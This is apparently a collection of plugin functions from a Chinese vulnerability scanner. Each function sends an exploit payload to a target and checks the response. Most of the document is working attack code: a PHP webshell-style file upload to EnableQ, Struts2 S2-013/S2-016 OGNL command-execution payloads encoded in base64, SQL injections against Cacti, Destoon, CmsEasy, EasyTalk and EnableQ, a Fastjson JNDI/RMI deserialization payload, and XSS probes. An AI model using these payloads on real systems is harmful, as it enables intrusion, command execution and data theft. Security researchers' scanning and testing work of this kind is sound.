调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/enableq/Android/FileUpload.php?optionID=1' payload_url = scheme + "://" + url +":"+ str(port) + payload data = """ ------WebKitFormBoundaryQXp86Nj8hIcFckX4 Content-Disposition: form-data; name="uploadedfile_1"; filename="xxx.php" Content-Type: application/octet-stream <?php echo md5(1);unlink(__FILE__);?> ------WebKitFormBoundaryQXp86Nj8hIcFckX4 Content-Disposition: form-data; name="button" 提交 ------WebKitFormBoundaryQXp86Nj8hIcFckX4-- """ headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("true|1|") != -1 : Medusa = "{}存在EnableQ任意文件上传漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port data = base64.b64decode( "cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3bmV0c3RhdCUyMC1hbiUyNy50b1N0cmluZygpLnNwbGl0KCUyN1xccyUyNykpKS5zdGFydCgpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlciglMjdcXEElMjcpLCUyM3N0ciUzZCUyM3MuaGFzTmV4dCgpPyUyM3MubmV4dCgpOiUyNyUyNywlMjNyZXNwJTNkJTIzY29udGV4dC5nZXQoJTI3Y28lMjclMmIlMjdtLm9wZW4lMjclMmIlMjdzeW1waG9ueS54d28lMjclMmIlMjdyazIuZGlzcCUyNyUyYiUyN2F0Y2hlci5IdHRwU2VyJTI3JTJiJTI3dmxldFJlcyUyNyUyYiUyN3BvbnNlJTI3KSwlMjNyZXNwLnNldENoYXJhY3RlckVuY29kaW5nKCUyN1VURi04JTI3KSwlMjNyZXNwLmdldFdyaXRlcigpLnByaW50bG4oJTIzc3RyKSwlMjNyZXNwLmdldFdyaXRlcigpLmZsdXNoKCksJTIzcmVzcC5nZXRXcml0ZXIoKS5jbG9zZSgpfQ==" ) try: payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-016\r\n返回数据:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cdef.php?action=actions" data = "selected_items=a:1:{i:0;s:31:" ',benchmark(10000000,md5(c)),' ";}&drp_action=1 " payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/member/chat.php?touser=admin' data = "forward=aaaa%2527),(12345678901234567890123456789012,(select%2574 md5(c)),%2527test2test2%2527,4%25275" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在DestoonSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/celive/live/header.php" data = { 'xajax': 'LiveMessage', 'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select md5(233)))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2') #" } payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text if con.find("e165421110ba03099a1c0393373c5b43") != -1: Medusa = "{}存在CmsEasySQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() #DL="dsada11111sda.xhqp3u.dnslog.cn" data = '''{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://%s/Exploit","autoCommit":true}''' % DL.dns_host( ) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', "Connection": "close", "Accept-Encoding": "gzip, deflate" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 400: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(10) payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('<script>alert("' + rm + '")</script>') != -1: Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port data = base64.b64decode( "YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCduZXRzdGF0IC1hbicpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0=" ) try: payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-013\r\n返回数据:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("<script>confirm({})</script>".format(rm)) != -1: Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/?m=index&a=checkreset' data = "urldata=YWFhYWFhYWEmdXNlcl9uYW1lPXl1XCZtYWlsYWRyZXM9VU5JT04vKiovU0VMRUNULyoqLzEsMixtZDUoMTIzMzIxKSw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNiwyNywyOCwyOSwzMCwzMSwzMiwzMywzNCwzNSwzNiwzNywzOCwzOSw0MCw0MSM=" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c8837b23ff8aaa8a2dde915473ce0991") != -1: Medusa = "{}存在EasyTalkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/r.php?qlang=cn&qid=&step=1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "X-Forwarded-For": "1.1.1.1", 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } mail = "testvul" + str(random.randint(1000, 9999)) + "@testvul.net" data = 'administrators_Name=' + mail + '&nickName=testvul&passWord=123456&passWord2=123456&hintPass=3&answerPass=testvul&Action=MemberAddSubmit&submit=%D7%A2%B2%E1&qid=' resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text if con.find("administratorsName") != -1 and con.find( "Bad SQL Query") != -1: Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名